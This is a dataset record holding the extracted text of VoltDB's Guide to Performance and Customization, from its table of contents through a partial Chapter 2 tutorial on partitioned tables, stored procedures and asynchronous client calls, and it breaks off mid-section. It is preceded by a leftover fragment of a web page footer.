&Performance(/development/real-time-and-performance)Real-world Applications(/development/real-world-applications)Safety & Security(/development/safety-and-security)System Integration(/development/system-integration)GLOBAL NETWORK EE Times Asia (http://www.eetasia.com/) EE Times China (http://www.eet-china.com/) EE Times Europe (http://www.electronics-eetimes.com/) EE Times India(http://www.eetindia.co.in/) EE Times Japan (http://eetimes.jp/) EE Times Korea (http://www.eetkorea.com/) EE Times Taiwan (http://www.eettaiwan.com/) EDN Asia(http://www.ednasia.com/) EDN China (http://www.ednchina.com/) EDN Japan (http://ednjapan.com/) TechOnline India (http://www.techonlineindia.com/) ESC Brazil(http://www.escbrazil.com.br/en/) ESC India (http://www.esc-india.com/)\n(http://ubmcanon.com/)UBM Canon Electronics Engineering CommunitiesEE Times (http://www.eetimes.com/) | EDN (http://www.edn.com/) | EBN (http://www.ebnonline.com/) | DataSheets.com (http://www.datasheets.com/) | Embedded (http://www.embedded.com/) | TechOnline (http://www.techonline.com/) | Design News (http://www.designnews.com/) | DesignCon (http://www.designcon.com/) | ESC (http://www.embeddedconf.com/)Working With Us: About (http://ubmcanon.com/) | Contact Us (http://ubmcanon.com/design-and-manufacturing/) | Media Kits (http://ubmcanon.com/design-and-manufacturing/)Terms of Service (http://ubmcanon.com/terms-of-service/) | Privacy Statement (http://ubmcanon.com/privacy-policy/) | Copyright © 2015 UBM Canon All Rights Reserved (http://legal.us.ubm.com/copyright-notice/)" } ]
{ "category": "App Definition and Development", "file_name": "PerfGuide.pdf", "project_name": "VoltDB", "subcategory": "Database" }
[ { "data": "Guide to Performance and\nCustomizaon\nAbstract\nThis book explains how to optimize application performance and customize database fea-\ntures using VoltDB.\nV11.3Guide to Performance and Customization\nV11.3\nCopyright © 2008-2022 Volt Active Data, Inc.\nThe text and illustrations in this document are licensed under the terms of the GNU Affero General Public License Version 3 as published by the\nFree Software Foundation. See the GNU Affero General Public License ( http://www.gnu.org/licenses/ ) for more details.\nMany of the core VoltDB database features described herein are part of the VoltDB Community Edition, which is licensed under the GNU Affero\nPublic License 3 as published by the Free Software Foundation. Other features are specific to the VoltDB Enterprise Edition and VoltDB Pro, which\nare distributed by Volt Active Data, Inc. under a commercial license.\nThe VoltDB client libraries, for accessing VoltDB databases programmatically, are licensed separately under the MIT license.\nYour rights to access and use VoltDB features described herein are defined by the license you received when you acquired the software.\nVoltDB is a trademark of Volt Active Data, Inc.\nVoltDB software is protected by U.S. Patent Nos. 9,600,514, 9,639,571, 10,067,999, 10,176,240, and 10,268,707. Other patents pending.\nThis document was generated on March 07, 2022.Table of Contents\nPreface ............................................................................................................................. ix\n1. Organization of this Manual ..................................................................................... ix\n2. Other Resources ..................................................................................................... ix\n1. Introduction .................................................................................................................... 1\n1.1. What Affects Performance? .................................................................................... 1\n1.2. How to Use This Book .......................................................................................... 1\n2. Hello, World! Revisited .................................................................................................... 3\n2.1. Optimizing your Application for VoltDB .................................................................. 3\n2.2. Applying Hello World to a Practical Problem ............................................................ 3\n2.3. Partitioned vs. Replicated Tables ............................................................................. 4\n2.3.1. Defining the Partitioning Column .................................................................. 4\n2.3.2. Creating the Stored Procedures ..................................................................... 5\n2.4. Using Asynchronous Stored Procedure Calls .............................................................. 6\n2.4.1. Understanding Asynchronous Programming .................................................... 7\n2.4.2. The Callback Procedure ............................................................................... 8\n2.4.3. Making an Asynchronous Procedure Call ........................................................ 9\n2.5. Connecting to all Servers ....................................................................................... 9\n2.6. Putting it All Together ......................................................................................... 10\n2.7. Next Steps ......................................................................................................... 12\n3. Understanding VoltDB Execution Plans ............................................................................. 13\n3.1. How VoltDB Selects Execution Plans for Individual SQL Statements ............................ 13\n3.2. Understanding VoltDB Execution Plans .................................................................. 13\n3.3. Reading the Execution Plan and Optimizing Your SQL Statements ............................... 14\n3.3.1. Evaluating the Use of Indexes ..................................................................... 15\n3.3.2. Evaluating the Table Order for Joins ............................................................ 17\n4. Using Indexes Effectively ............................................................................................... 19\n4.1. Basic Principles for Effective Indexing .................................................................... 19\n4.2. Defining Indexes ................................................................................................. 20\n4.3. The Goals for Effective Indexing ........................................................................... 20\n4.4. How Indexes Work .............................................................................................. 21\n4.5. Summary ........................................................................................................... 22\n5. A Modern Java Client Programming Interface (API) for VoltDB ............................................ 24\n5.1. Configuring the Client .......................................................................................... 24\n5.2. Connecting to the Database ................................................................................... 25\n5.3. Calling Procedures ............................................................................................... 25\n5.3.1. Handling Backpressure .............................................................................. 25\n5.3.2. Handling Request Timeouts ........................................................................ 26\n5.3.3. Defining Options on a Per-Call Basis ........................................................... 27\n6. Prioritizing Transactions .................................................................................................. 28\n6.1. How Prioritizing Transactions Works ...................................................................... 28\n6.2. Enabling Prioritized Transactions ........................................................................... 30\n6.3. Prioritizing Transactions at Runtime ....................................................................... 30\n6.4. Prioritizing Other Types of Transactions .................................................................. 31\n7. Creating Flexible Schemas With JSON .............................................................................. 33\n7.1. Using JSON Data Structures as VoltDB Content ....................................................... 33\n7.2. Querying JSON Data ........................................................................................... 34\n7.3. Updating JSON Data ........................................................................................... 35\n7.4. Indexing JSON Fields .......................................................................................... 35\n7.5. Summary: Using JSON in VoltDB ......................................................................... 36\n8. Creating Geospatial Applications ...................................................................................... 37\n8.1. The Geospatial Datatypes ..................................................................................... 37\niiiGuide to Performance\nand Customization\n8.1.1. The GEOGRAPHY_POINT Datatype ........................................................... 37\n8.1.2. The GEOGRAPHY Datatype ...................................................................... 37\n8.1.3. Sizing GEOGRAPHY Columns ................................................................... 38\n8.1.4. How Geospatial Values are Interpreted ......................................................... 39\n8.2. Entering Geospatial Data ...................................................................................... 39\n8.3. Working With Geospatial Data .............................................................................. 40\n8.3.1. Working With Locations ............................................................................ 41\n8.3.2. Working With Regions .............................................................................. 42\n9. Creating Custom Importers, Exporters, and Formatters ......................................................... 44\n9.1. Writing a Custom Exporter ................................................................................... 44\n9.1.1. The Structure and Workflow of the Export Client ........................................... 44\n9.1.2. How to Use Custom Properties to Configure the Client .................................... 46\n9.1.3. How to Compile and Install the Client .......................................................... 46\n9.1.4. How to Configure the Export Client ............................................................. 47\n9.2. Writing a Custom Importer ................................................................................... 47\n9.2.1. Designing and Coding a Custom Importer ..................................................... 48\n9.2.2. Packaging and Installing a Custom Importer .................................................. 49\n9.2.3. Configuring and Running a Custom Importer ................................................. 50\n9.3. Writing a Custom Formatter .................................................................................. 51\n9.3.1. The Structure of the Custom Formatter ......................................................... 51\n9.3.2. Compiling and Packaging Custom Formatter Bundles ...................................... 53\n9.3.3. Installing and Invoking Custom Formatters .................................................... 54\n9.3.4. Using Custom Formatters With the kafkaloader Utility .................................... 55\n10. Creating Custom SQL Functions ..................................................................................... 57\n10.1. Writing a User-Defined Scalar Function ................................................................ 57\n10.2. Writing a User-Defined Aggregate Function ........................................................... 58\n10.3. Loading User-Defined Functions into the Database .................................................. 60\n10.4. Declaring a User-Defined Function ....................................................................... 60\n10.5. Invoking User-Defined Functions in SQL Statements ............................................... 61\n11. Creating Custom Tasks ................................................................................................. 62\n11.1. Overview of How Custom Tasks Work ................................................................. 62\n11.2. Modifying the Procedure Call and Arguments ......................................................... 63\n11.2.1. Designing a Java Class That Implements ActionGenerator .............................. 63\n11.2.2. Compiling and Loading the Class into VoltDB ............................................. 66\n11.2.3. Declaring the Task .................................................................................. 66\n11.3. Modifying the Interval Between Invocations ........................................................... 66\n11.3.1. Designing a Java Class That Implements IntervalGenerator ............................. 67\n11.3.2. Compiling and Loading the Class into VoltDB ............................................. 69\n11.3.3. Declaring the Task .................................................................................. 69\n11.4. Modifying Both the Procedure and Interval ............................................................ 69\n11.4.1. Designing a Java Class That Implements ActionScheduler .............................. 70\n11.4.2. Compiling and Loading the Class into VoltDB ............................................. 72\n11.4.3. Declaring the Task .................................................................................. 73\n12. Understanding VoltDB Memory Usage ............................................................................ 74\n12.1. How VoltDB Uses Memory ................................................................................ 74\n12.2. Actions that Impact Memory Usage ...................................................................... 75\n12.3. How VoltDB Manages Memory ........................................................................... 77\n12.4. How Memory is Allocated and Deallocated ............................................................ 78\n12.5. Controlling How Memory is Allocated .................................................................. 78\n12.6. Understanding Memory Usage for Specific Applications ........................................... 79\n13. Managing Time ........................................................................................................... 81\n13.1. The Importance of Time ..................................................................................... 81\n13.2. Using NTP to Manage Time ................................................................................ 81\n13.2.1. Basic Configuration ................................................................................. 81\nivGuide to Performance\nand Customization\n13.2.2. Troubleshooting Issues with Time .............................................................. 82\n13.2.3. Correcting Common Problems with Time .................................................... 82\n13.2.4. Example NTP Configuration ..................................................................... 83\n13.3. Configuring NTP in a Hosted, Virtual, or Cloud Environment .................................... 84\n13.3.1. Considerations for Hosted Environments ..................................................... 85\n13.3.2. Considerations for Virtual and Cloud Environments ....................................... 85\nvList of Figures\n2.1. Synchronous Procedure Calls .......................................................................................... 7\n2.2. Asynchronous Procedure Calls ........................................................................................ 7\n9.1. Structure of the Custom Export Class ............................................................................. 45\n12.1. The Three Types of Memory in VoltDB ........................................................................ 75\n12.2. Details of Memory Usage During and After an SQL Statement .......................................... 76\n12.3. Controlling the Java Heap Size .................................................................................... 79\nviList of Tables\n9.1. Structure of the Custom Importer ................................................................................... 47\nviiList of Examples\n11.1. Custom Task Implementing ActionGenerator .................................................................. 65\n11.2. Custom Task Implementing IntervalGenerator ................................................................ 68\n11.3. Custom Task Implementing ActionScheduler .................................................................. 71\n13.1. Custom NTP Configuration File ................................................................................... 84\nviiiPreface\nThis book provides details on using VoltDB to optimize the performance of your database application\nas well as customize selective features of the VoltDB product. Other books — specifically the VoltDB\nTutorial and Using VoltDB — describe the basic features of VoltDB and how to use them. However, cre-\nating an optimized application requires using those features in the right combination and in the appropriate\ncontext. What features you use and how depends on your specific application needs. This manual provides\nadvice on those decisions.\n1. Organization of this Manual\nThis book is divided into 13 chapters:\n•Chapter 1, Introduction\n•Chapter 2, Hello, World! Revisited\n•Chapter 3, Understanding VoltDB Execution Plans\n•Chapter 4, Using Indexes Effectively\n•Chapter 5, A Modern Java Client Programming Interface (API) for VoltDB\n•Chapter 6, Prioritizing Transactions\n•Chapter 7, Creating Flexible Schemas With JSON\n•Chapter 8, Creating Geospatial Applications\n•Chapter 9, Creating Custom Importers, Exporters, and Formatters\n•Chapter 10, Creating Custom SQL Functions\n•Chapter 11, Creating Custom Tasks\n•Chapter 12, Understanding VoltDB Memory Usage\n•Chapter 13, Managing Time\n2. Other Resources\nThis book provides recommendations for optimizing VoltDB applications and customizing database fea-\ntures. It assumes you are already familiar with VoltDB and its features. If you are new to VoltDB, we\nsuggest you read the following books first:\n•VoltDB Tutorial provides a quick introduction to the product and is recommended for new users.\n•VoltDB Planning Guide provides guidance for evaluating and sizing VoltDB implementations.\n•Using VoltDB provides a complete reference to the features and functions of the VoltDB product.\n•VoltDB Administrator's Guide provides information for system operators on setting up and managing\nVoltDB databases and the clusters that host them.\nThese books and more resources are available on the web from http://docs.voltdb.com/ .\nixChapter 1. Introducon\nVoltDB is a best-in-class database designed specifically for high volume transactional applications. Other\nbooks describe the individual features and functions of VoltDB. However, getting the most out of any\ntechnology is not just a matter of features; it is using the features effectively, in the right combination,\nand in the right context.\nThe goal of this book is to explain how to achieve maximum performance using VoltDB. Performance is\naffected by many different factors, including:\n•The design of your database and its stored procedures\n•The client applications\n•The configuration of the servers that run the database\n•The network that connects the servers\nUnderstanding the impact of each factor and the relationship between them can help you both design better\nsolutions and detect and correct problems in a running system. However, first you must understand the\nproduct itself. If you are new to VoltDB, it is strongly recommended that you read VoltDB Tutorial and\nUsing VoltDB before reading this book.\n1.1. What Affects Performance?\nThere is no single factor that drives performance or even a single definition for what constitutes \"good\"\nperformance. VoltDB is designed to provide exceptional throughput and much of this book is dedicated\nto an explanation of how you can maximize throughput in your application design and hardware config-\nuration.\nHowever, another aspect of performance that is equally important to database applications is durability:\nresilience against — and ability to recover from — hardware failures and other error conditions. VoltDB\nhas features that enhance database durability. However, these features have their own requirements, par-\nticularly on system sizing and configuration.\nAll applications are different. There is no single combination of application design, hardware configura-\ntion, or database features that can satisfy them all. Your specific requirements drive the trade offs that\nneed to be made concerning how you configure the database system as a whole. The goal of this book is\nto provide you with the facts you need to make an informed decision about those trade offs.\n1.2. How to Use This Book\nThis book is divided into ten more chapters:\n•The beginning of the book (chapters 2 and 4) explains how to design your database schema, stored\nprocedures, and client applications for maximum performance.\n•Chapters 5 and 6 explain how to use the latest Java Client API to create a modern, efficient Java appli-\ncation using VoltDB and how to use the new client library to prioritize your transactions.\n•Chapter 7 explains how to accommodate flexibility in the schema design through the use of JSON\ncolumns and indexes.\n1Introduction\n•Chapter 8 explains how to use VoltDB's geospatial capabilities for applications that need to combine\nstandard database content with location-specific information such geographic points and shapes.\n•Chapter 9 explains how to create custom connectors for import and export, as well as formatters to be\nused by importers.\n•Chapters 10 explains how to define your own scalar and aggregate functions for use in SQL statements.\n•Chapters 11 explains how to implement custom tasks that execute stored procedures on a specified\nschedule.\n•Chapter 12 explains in detail how memory is used by the VoltDB server process.\n•Chapter 13 provides guidelines for configuring time services when running a VoltDB cluster.\n2Chapter 2. Hello, World! Revisited\nThe VoltDB software kit includes a Hello World example in the directory /doc/tutorials/hel-\nloworld that shows you how to create a simple VoltDB application, including a schema, stored proce-\ndures, and a client application. However, storing five records and doing a single SELECT is not a terribly\ninteresting database application.\nVoltDB is designed to process hundreds of thousands of transactions a second, providing unparalleled\nthroughput. Hello World does little to demonstrate that. But perhaps we can change it a bit to better em-\nulate real world situations and, in the process, learn how to write applications that maximize the power\nof VoltDB.\n2.1. Optimizing your Application for VoltDB\nVoltDB can be used generically like any other database to insert, select, and update records. But VoltDB\nalso specializes in:\n•Scalability\n•Throughput performance\n•Durability\nDurability is built into the VoltDB database server software through several different functions, including\nsnapshots, K-Safety, and command logging, features that are described in more detail in the Using VoltDB\nmanual. Scalability and throughput are related to server configuration (e.g. number of servers, memory\ncapacity, etc.). However, there are several things that can be done in the design of the database and the\nclient application to maximize the throughput on any cluster. In particular, this update to the Hello World\ntutorial focuses on designing your application to take advantage of:\n•Partitioned and replicated tables\n•Asynchronous stored procedure calls\n•Client connections to all nodes in the database cluster\n2.2. Applying Hello World to a Practical Problem\nThe problem with Hello World is that it doesn't match any real problem, and certainly not one that VoltDB\nis designed to solve. However, it is not too hard to think of a practical problem where saying hello could\nbe useful.\nLet's assume we run a system (a website, for example) where users register and log in to use services. We\nwant to acknowledge when a user logs in by saying hello. Let's further assume that our system is global\nin nature. It would be nice if we could say hello in the user's native language.\nTo support our new user sign in process, we need to store the different ways of saying hello in each\nlanguage and we need to record the native language of the user. Then, when they sign in, we can retrieve\ntheir name and the appropriate word for hello.\nThis means we need two tables, one for the word \"hello\" in different languages and one for the users. We\ncan reuse the HELLOWORLD table from our original application for the first table. But we need to add a\n3Hello, World! Revisited\ntable for user data, including a unique identifier, the user's name, and their language. Often, the best and\neasiest unique identifier for an online account is the user's email address. So that is what we will use. Our\nschema now looks like this:\nCREATE TABLE HELLOWORLD (\n HELLO VARCHAR(15),\n WORLD VARCHAR(15),\n DIALECT VARCHAR(15) NOT NULL,\n PRIMARY KEY (DIALECT)\n);\nCREATE TABLE USERACCOUNT (\n EMAIL VARCHAR(128) UNIQUE NOT NULL,\n FIRSTNAME VARCHAR(15),\n LASTNAME VARCHAR(15),\n LASTLOGIN TIMESTAMP,\n DIALECT VARCHAR(15) NOT NULL,\n PRIMARY KEY (EMAIL)\n);\nOh, by the way, now that you know how to write a basic VoltDB application, you don't need to type in\nthe sample code yourself anymore. You can concentrate on understanding the nuances that make VoltDB\napplications exceptional. The complete sources for the updated Hello World example are available in the\ndoc/tutorials/helloworldrevisited subfolder when you install the VoltDB software.\n2.3. Partitioned vs. Replicated Tables\nIn the original Hello World example, we partitioned the HELLOWORLD table on dialect to demon-\nstrate partitioning, which is a key concept for VoltDB. However, there are only so many languages in\nthe world, and the words for \"hello\" and \"world\" are not likely to change frequently. In other words, the\nHELLOWORLD table is both small and primarily read-only.\nNot all tables need to be partitioned. If a table is small and updated infrequently, it can be replicated .\nCopies of a replicated table are stored on every server. This means that the tables can only be updated\nwith a multi-partition procedure (which is why you shouldn't replicate write-intensive tables). However,\nreplicated tables can be read from any single-partitioned procedure since there is a copy available to every\npartition.\nHELLOWORLD is an ideal candidate for replication, so we will replicate it in this iteration of the Hello\nWorld application.\nUSERACCOUNT, on the other hand, is write-intensive. The table is updated every time a user signs in\nand the record count increases as new users register with the system. Therefore, it is important that we\npartition this table.\n2.3.1. Defining the Partitioning Column\nThe partitioning column needs to support the key access methods for the table. In the case of registered\nusers, the table is accessed via the user's unique ID, their email address, when the user signs in. So we will\ndefine the EMAIL column as the partitioning column for the table.\nThe choice of partitioning column is defined in the database schema. If a table is not listed as being parti-\ntioned, it becomes a replicated table by default. So for the updated Hello World example, you can remove\n4Hello, World! Revisited\nthe PARTITION TABLE statement for the HELLOWORLD table and add one for USERACCOUNT.\nThe updated schema contains the following PARTITION TABLE statement:\nPARTITION TABLE USERACCOUNT ON COLUMN EMAIL;\n2.3.2. Creating the Stored Procedures\nFor the sake of demonstration, we only need three stored procedures for our rewrite of Hello World:\n•Insert Language — Loads the HELLOWORLD table, just as in the original Hello World tutorial.\n•Register User — Creates a new USERACCOUNT record.\n•Sign In — Performs the bulk of the work, looking up the user, recording their sign in, and looking up\nthe correct word for saying hello.\n2.3.2.1. Loading the Replicated Table\nTo load the HELLOWORLD table, we can reuse the Insert stored procedure from our original Hello World\nexample. The only change we need to make is, because HELLOWORLD is now a replicated table, remove\nthe PARTITION ON clause from the CREATE PROCEDURE statement that defines the Insert procedure\nin the schema DDL.\n2.3.2.2. Registering New Users\nTo add a new user to the system, the RegisterUser stored procedure needs to add the user's name, language,\nand their email address as the unique identifier for the USERACCOUNT table.\nCreating a new record can be done with a single INSERT statement. In this way, the RegisterUser proce-\ndure is very similar to the Insert procedure for the HELLOWORLD table. The RegisterUser procedure\nlooks like this:\nCREATE PROCEDURE RegisterUser\n AS INSERT INTO USERACCOUNT \n (Email, Firstname, Lastname, Dialect)\n VALUES (?,?,?,?);\nThe difference is that RegisterUser can and should be single-partitioned so it does not unnecessarily tie\nup multiple partitions. Since the table is partitioned on the EMAIL column, the CREATE PROCEDURE\nstatement should include a PARTITION ON clause like so:\nCREATE PROCEDURE RegisterUser\n PARTITION ON TABLE Useraccount COLUMN Email\n AS INSERT INTO USERACCOUNT \n (Email, Firstname, Lastname, Dialect)\n VALUES (?,?,?,?);\n2.3.2.3. Signing In\nFinally, we need a procedure to sign in the user and retrieve the word for \"hello\" in their native language.\nThe key goal for this procedure, since it will be invoked more frequently than any other, is to be performant.\nTo ensure the highest throughput, the procedure needs to be single-partitioned.\n5Hello, World! Revisited\nThe user provides their email address as the unique ID when they log in, so we can make the procedure\nsingle-partitioned, specifying the email address as the partitioning value. Within the procedure itself we\nperform two actions:\n•Join the USERACCOUNT and HELLOWORLD tables based on the Dialect column to retrieve both\nthe user's name and the appropriate word for \"hello\"\n•Update the user's record with the latest login timestamp.\nBecause this stored procedure uses two queries, we can write the stored procedure logic as a Java class.\n(See Using VoltDB for details on writing Java stored procedures.) We could write custom code to check the\nreturn values from the join of the two tables to ensure that an appropriate user record was found. However,\nVoltDB provides predefined expectations for many common query conditions. We can take advantage\nof one of these expectations, EXPECTS_ONE_ROW, to verify that we get the results we want. If the\nfirst query, getuser, does not return one row (for example, if no user record is found), VoltDB aborts the\nprocedure and notifies the calling program that a rollback has occurred.\nExpectations provide a way to simplify and standardize error handling in your stored procedures. See the\nchapter on simplifying application coding in the Using VoltDB manual for more information.\nThe resulting SignIn procedure is as follows:\nimport org.voltdb.*;\npublic class SignIn extends VoltProcedure {\n public final SQLStmt getuser = new SQLStmt(\n \"SELECT H.HELLO, U.FIRSTNAME \" +\n \"FROM USERACCOUNT AS U, HELLOWORLD AS H \" +\n \"WHERE U.EMAIL = ? AND U.DIALECT = H.DIALECT;\"\n );\n public final SQLStmt updatesignin = new SQLStmt(\n \"UPDATE USERACCOUNT SET lastlogin=? \" +\n \"WHERE EMAIL = ?;\"\n );\n public VoltTable[] run( String id, long signintime)\n throws VoltAbortException {\n voltQueueSQL( getuser, EXPECT_ONE_ROW, id );\n voltQueueSQL( updatesignin, signintime, id );\n return voltExecuteSQL();\n }\n}\nWe also want to declare the procedure and define how it is partitioned in the schema DDL. To do that,\nwe add the following statement to our schema file:\nCREATE PROCEDURE \n PARTITION ON TABLE Useraccount COLUMN Email\n FROM CLASS SignIn;\n2.4. Using Asynchronous Stored Procedure Calls\nNow we are ready to write the client application. There are two key aspects to taking full advantage of\nVoltDB in your client applications. One is make connections to all nodes on the cluster, which we will\ndiscuss shortly. The other is to use asynchronous stored procedure calls.\n6Hello, World! Revisited\nYou can call VoltDB stored procedures either synchronously or asynchronously. When you call a stored\nprocedure synchronously, your client application waits for the call to be processed before continuing. If\nyou call a procedure asynchronously, your application continues processing once the call has been initiated.\nOnce the procedure is complete, your application is notified through a callback procedure.\n2.4.1. Understanding Asynchronous Programming\nSynchronous calls are easy to understand because all processing is linear; your application waits for the\nquery results. However, after VoltDB processes a transaction — between when VoltDB sends back the\nresults, your application handles the results, initiates a new procedure call, and the call reaches the VoltDB\nserver — the VoltDB database has no work to do (assuming there is only one client application). In this\nsituation whether the stored procedures are single- or multi-partitioned doesn't matter, since you are only\never asking the cluster to process one procedure at a time.\nAs shown in Figure 2.1, “Synchronous Procedure Calls” , more time can be spent in the round trip between\ntransactions (shown in yellow) than in processing the stored procedures themselves.\nFigure 2.1. Synchronous Procedure Calls\nWhat you would like to do is queue up as much work (i.e. transactions) as possible so the database always\nhas work to do as soon as each transaction is complete. This is what asynchronous stored procedure calls do.\nAs soon as an asynchronous call is initiated, your application continues processing, including making\nadditional asynchronous calls. These calls are queued up on the servers and processed in the order they\nare received. Once a stored procedure is processed, the results are returned to the calling application and\nthe next queued transaction started. As Figure 2.2, “Asynchronous Procedure Calls” shows, the database\ndoes not need to wait for the next procedure request, it simply takes the next entry off the queue as soon\nas the current procedure is complete.\nFigure 2.2. Asynchronous Procedure Calls\n7Hello, World! Revisited\n2.4.2. The Callback Procedure\nFor asynchronous procedures calls, you must provide a callback procedure that is invoked when the re-\nquested transaction is complete. Your callback procedure notifies the client application that the call is\ncomplete and performs the same logic your client application normally performs following a procedure\ncall: interpreting the results of the procedure (if any) and making appropriate changes to client application\nvariables.\nFor our new Hello World example, when the SignIn procedure completes, we want to display the return\nvalues in a welcome message to the user. So our callback procedure might look like this:\n static class SignInCallback implements ProcedureCallback { \n @Override\n public void clientCallback(ClientResponse response) { \n // Make sure the procedure succeeded.\n if (response.getStatus() != ClientResponse.SUCCESS) {\n System.err.println(response.getStatusString());\n return;\n }\n VoltTable results[] = response.getResults(); \n VoltTable recordset = results[0];\n System.out.printf(\"%s, %s!\\n\",\n recordset.fetchRow(0).getString(\"Hello\"),\n recordset.fetchRow(0).getString(\"Firstname\") );\n }\n }\nThe following notes describe the individual components of the callback procedure.\nYou define the callback procedure as a class that implements (and overrides) the VoltDB Procedure-\nCallback class.\nWhereas a synchronous procedure call returns the ClientResponse as a return value, an asynchronous\ncall returns the same ClientResponse object as a parameter to the callback procedure.\nIn the body of the callback, first we check to make sure the procedure completed successfully. (If\nthe procedure fails for any reason, for example if a SQL query generates a constraint violation, the\nClientResponse contains information about the failure.) In this case we are only looking for success.\nOnce we know the procedure succeeded, we perform the same functions we would for a synchronous\ncall. In this case, we retrieve the appropriate words from the response and use them to construct and\ndisplay a greeting to the user.\nSince we also want to call the RegisterUser procedure asynchronously, we need to create a callback for that\nprocedure as well. In the case of registering the user, we do not need to provide feedback, so the callback\nprocedure is simplified. All that is needed in the body of the callback is to detect and report any errors that\nmight occur. The RegisterCallback looks like this:\n8Hello, World! Revisited\n static class RegisterCallback implements ProcedureCallback {\n @Override\n public void clientCallback(ClientResponse response) {\n // Make sure the procedure succeeded. If not\n // (for example, account already exists), \n // report the error.\n if (response.getStatus() != ClientResponse.SUCCESS) {\n System.err.println(response.getStatusString());\n }\n }\n }\n2.4.3. Making an Asynchronous Procedure Call\nOnce you define a callback, you are ready to initiate the procedure call. You make asynchronous procedure\ncalls in the same way you make synchronous procedure calls. The only differences are that you specify\nthe callback procedure as the first argument to the callProcedure method and you do not need to make an\nassignment to a client response, since the response is sent as a parameter to the callback procedure.\nThe following example illustrates both a synchronous and an asynchronous call to the SignIn procedure\nwe defined earlier:\n // Synchronous procedure call\nClientResponse response = myApp.callProcedure(\"SignIn\",\n email, currenttime);\n // Asynchronous procedure call\nmyApp.callProcedure(new SignInCallback(), \"SignIn\",\n email, currenttime);\nIf you do not need to verify the results of a transaction, you do not even need to create a unique callback\nprocedure. Just as you can make a synchronous procedure call and not assign the results to a local object if\nthey are not needed, you can make an asynchronous procedure call using the default callback procedure,\nwhich does no special processing. For example, the following code calls the Insert procedure to add a\nHELLOWORLD record using the default callback:\nmyApp.callProcedure(new ProcedureCallback(), \"Insert\",\n \"English\", \"Hello\", \"World\");\n2.5. Connecting to all Servers\nThe final step, once you have optimized the partitioning and the procedure invocations, is to maximize the\nbandwidth between your client application and the cluster. You can create connections to any of the servers\nin the cluster and that server will coordinate the processing of your transactions with the other nodes.\nEach node in the cluster has its own queue of pending transactions. That node is responsible for:\n•Receiving the transaction request from the client and returning the results upon completion\n•Routing the transaction to the appropriate partition, or initiator, based on the transaction's characteristics.\nThere is one initiator for each unique partition, and a separate initiator for multi-partition transactions\nwithin the cluster. Once the initiator receives the transaction, it is responsible for:\n9Hello, World! Revisited\n•Scheduling the transaction with the other nodes in the cluster\n•Distributing the work items for the transaction to the appropriate nodes and partitions and collecting\nresponses when it is time to execute the transaction\nAny node in the cluster can receive transaction requests. However, for maximum performance it is best if\nall nodes do their share. Initiators are automatically distributed around the cluster. But if only one node is\ninteracting with the client application, managing the queue can become a bottleneck and leave the other\nnodes in the cluster idle while they wait for work items.\nThis is why the recommendation is for client applications to create connections to as many nodes in the\ncluster as possible. When there are multiple connections, the Java client interface will direct each transac-\ntion to the most appropriate server, avoiding extra \"hops\" within the cluster as requests are redirected to\nthe corresponding initiator. For other clients that support multiple connections, requests use a round-robin\napproach to distribute the procedure calls.\nBy default, the VoltDB sample applications assume a single server (localhost) and only create a single\nconnection. This makes the examples easy to read and easy to run for anyone who downloads the kit.\nHowever, in real world examples your client application should create connections to all of the nodes in\nthe cluster to evenly distribute the work load and avoid network bottlenecks.\nThe update to the Hello World example demonstrates one method for doing this. Since it is difficult to know\nin advance what nodes are used in the cluster, the revised application uses an argument on the command\nline to specify what nodes to connect to. (Avoiding hard-coded server names is also a good practice so\nyou do not have to recode your application if you add or replace servers in the future.)\nThe first argument on the command line is assumed to be a comma-separated list of server names. This\nlist is converted to an array, which is used to create connections to each node. If there is no command line\nargument, the default server \"localhost\" is used. The following is the applicable code from the beginning\nof the client application. Note that only one client is instantiated but multiple connections are made from\nthat client object.\npublic static void main(String[] args) throws Exception {\n /*\n * Expect a comma-separated list of servers.\n * If not, use localhost.\n */\n String serverlist = \"localhost\";\n if (args.length > 0) { serverlist = args[0]; }\n String[] servers = serverlist.split(\",\");\n /*\n * Instantiate a client and connect to all servers\n */\n org.voltdb.client.Client myApp = ClientFactory.createClient();\n for (String server: servers) { \n myApp.createConnection(server);\n }\n2.6. Pung it All Together\nNow that we have defined the schema, created the stored procedures and the callback routines for asyn-\nchronous calls, and created connections to all of the nodes in the cluster, we can put together the new and\n10Hello, World! Revisited\nimproved Hello World application. We start by loading the HELLOWORLD table just as we did in the\nprevious version. Since this is only done once to initialize the run, we can make them synchronous calls.\nNote that we do not need to worry about constraint violations. If the client application is run two or more\ntimes, we can reuse the pre-loaded content.\n/*\n* Load the database.\n*/\ntry {\n myApp.callProcedure(\"Insert\", language[0], \"Hello\", \"World\");\n myApp.callProcedure(\"Insert\", language[1], \"Bonjour\", \"Monde\");\n myApp.callProcedure(\"Insert\", language[2], \"Hola\", \"Mundo\");\n myApp.callProcedure(\"Insert\", language[3], \"Hej\", \"Verden\");\n myApp.callProcedure(\"Insert\", language[4], \"Ciao\", \"Mondo\");\n} catch (Exception e) {\n // Not to worry. Ignore constraint violations if we \n // load this table more than once. \n}\nTo show off the performance, we then emulate the running system. We need some users. So, again, we\ninitialize a few user records using the RegisterUser stored procedure. As a demonstration, we use a utility\nmethod for generating pseudo-random email addresses.\n/*\n* Start by making sure there are at least 5 accounts\n*/\nwhile (maxaccountID < 5) {\n String first = firstname[seed.nextInt(10)];\n String last = lastname[seed.nextInt(10)];\n String dialect = language[seed.nextInt(5)];\n String email = generateEmail(maxaccountID);\n myApp.callProcedure(new RegisterCallback(),\"RegisterUser\",\n email,first,last,dialect );\n maxaccountID++;\n}\nFinally, we want to repeatedly call the SignIn stored procedure, while occasionally registering a new user\n(say, once every 100 sign ins).\n11Hello, World! Revisited\n/*\n* Emulate a busy system: 100 signins for every 1 new registration.\n* Run for 5 minutes.\n*/\nlong countdowntimer = System.currentTimeMillis() + (60 * 1000 * 5); \nwhile (countdowntimer > System.currentTimeMillis()) {\n for (int i=0; i<100; i++) {\n //int id = seed.nextInt(maxaccountID);\n String user = generateEmail(seed.nextInt(maxaccountID));\n myApp.callProcedure(new SignInCallback(), \"SignIn\",\n user, System.currentTimeMillis());\n }\n String first = firstname[seed.nextInt(10)];\n String last = lastname[seed.nextInt(10)];\n String dialect = language[seed.nextInt(5)];\n String email = generateEmail(maxaccountID);\n myApp.callProcedure(new RegisterCallback(),\"RegisterUser\",\n email,first,last,dialect);\n maxaccountID++;\n \n}\nThe completed source code can be found (and run) in the doc/tutorials/helloworldrevisit-\ned/ folder where VoltDB is installed. Give it a try on a single system or on a multi-node cluster.\n2.7. Next Steps\nUpdating the Hello World example demonstrates how to design applications that can maximize the value\nof the VoltDB software. However, even with these changes, Hello World is still 